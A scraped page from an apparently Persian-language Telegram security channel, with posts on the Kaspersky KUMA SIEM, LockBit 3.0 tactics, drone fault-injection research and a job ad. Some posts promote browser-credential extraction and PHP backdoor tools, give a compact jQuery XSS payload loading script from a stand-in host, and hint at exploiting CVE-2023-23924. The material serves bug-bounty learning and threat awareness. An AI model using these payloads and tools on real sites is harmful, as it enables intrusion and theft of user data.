Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
Kaspersky Unified Monitoring and Analysis Platform

   کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر می کنم می تونه خودش رو به عنوان یکی از پرچم داران این حوزه معرفی کنه.  

@Engineer_Computer
Network Security Channel
Kaspersky Unified Monitoring and Analysis Platform    کسپرسکی بالاخره محصول SIEM خودش رو در سبد فروش جهانی قرار داد و این محصول به زودی وارد بازار ایران میشه. این محصول که به KUMA معروفه در کنار قابلیت های خیره کننده ای که داره نکات کلیدی ای هم داره که فکر…
برخي از ويژگي هاي اين محصول:

   اول EPS محصول هست که می تونه تا 300K ورودی به ازای هر نود Correlation داشته باشه. این رو مقایسه کنید مثلا با ArcSight که حداکثر از 100K EPS پشتیبانی می کنه. نکته جالب دیگه اینه که می تونیم محصول رو در حالت Distribution پیاده کنیم و در واقع قابلیت LB رو داشته باشیم.
  نکته بعدی معماری سیستم هست که به صورت میکرو سرویس طراحی شده و این علاوه بر مصرف منابع فوق العاده پایین، باعث شده دست ما در مقیاس پذیری و توسعه زیرساخت باز باشه. و البته که از HA و Fault Tolerance هم پشتیبانی می کنه.
  نکته مهم دیگه Integration محصول با ابزارهای دیگه هست. این یکپارچه سازی رو میشه به دو قسمت تقسیم کرد: محصولات کسپرسکی و محصولات Third Party. برای محصولات Third Party مثل محصولات دیگه دست ما درKUMA هم باز هست و طیف وسیعی از ابزارها رو پشتیبانی می کنه. نکته جالب اینه که برای Parser نویسی هم خودمون می تونیم به راحتی داخلش Parser رو ایجاد کنیم و هم به لطف پشتیبانی مستقیم کسپرسکی در ایران، نوشتن Parser رو از خود شرکت درخواست کنیم. اما در مورد محصولات کسپرسکی داستان متفاوته. در اینجا میتونیم مفهوم یکپارچه سازی به معنای واقعی رو ببینیم، مثلا اتصال EPP کسپرسکی به KUMA یعنی می تونیم ازش به عنوان Inventory, Asset Management, Vulnerability Assessment و غیره استفاده کنیم. این محصول با بیشتر محصولات کسپرسکی ادغام می شه که من تصویرش رو گذاشتم. اما قابلیت های افزوده به قدری زیاده که نمیشه در این مقاله همه رو پوشش داد.
   این محصول توسط کسپرسکی نوشته شده. پس یعنی میتونه به Threat Intelligence کسپرسکی متصل بشه و در برابر رقبا یک برگ برنده قوی داشته باشه. و استفاده از TDF کسپرسکی یعنی قدرت شناسایی تهدیدات فوق العاده بالا. نکته کلیدی این محصول قابلیت response هست که فعلا در حد محصولات کسپرسکیه اما در نسخه های آینده قراره این قابلیت رو برای ابزارهای Third Party دیگه مثل فایروال هم پیاده سازی کنه
  کسپرسکی با ارائه این محصول قصد داره معنای XDR رو تغییر بده و البته که با وجود این محصول در قلب XDR خودش، عملا یک SOC کامل رو می تونه پیاده سازی کنه. 
#Kaspersky
#XDR
#Threatintelligence
#KUMA

@Engineer_Computer
_EA_EvadingEDR__05242023.pdf
4.9 MB
#کتاب evading EDR نسخه Early Access (یعنی نهایی نشده)
@Engineer_Computer
tools
Offensive security
1. HackBrowserData - CLI tool for decrypting/exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser
https://github.com/moonD4rk/HackBrowserData
2. Hiphp - Open source project for create a BackDoor to control PHP-based sites
https://github.com/yasserbdj96/hiphp

@Engineer_Computer
Bug Bounty Hint

Is your JS payload limited to only 44 symbols?

Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.

$('<script src=//dom.xss>').appendTo('body')


@Engineer_Computer
CVE-2023-23924: Dompdf up to 2.0.1 on PHP7 SVG Parser deserialization restoring in RCE.
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.

@Engineer_Computer
Bug Bounty Tip

Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.

Search:
window.addEventListener("message"

Inspect those events for potential XSS

@Engineer_Computer
Drone Security and Fault _ IOactive.pdf
1.6 MB
🔴 Drone Security and Fault Injection Attacks

🔴 هک پهپاد با تکنیک EMFI

محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.

https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf

https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/

@Engineer_Computer
امنیت اطلاعات در برابر فناوری اطلاعات
#اینفوگرافیک
👍1
#Forrester Wave :
Enterprise Email Security
Q2 2023
#Report
@Engineer_Computer
مقایسه XDR و SOAR و SIEM
#اینفوگرافیک
#استخدام
بانک تجارت و شرکت‌های تابعه‌ش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT

علاقمندان رزومه‌‌شون رو به ایمیل زیر ارسال کنند:
[email protected]

@Engineer_Computer
#Ransomware #LockBit 3.0
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.

اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های  Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.

اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.

استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.

@Engineer_Computer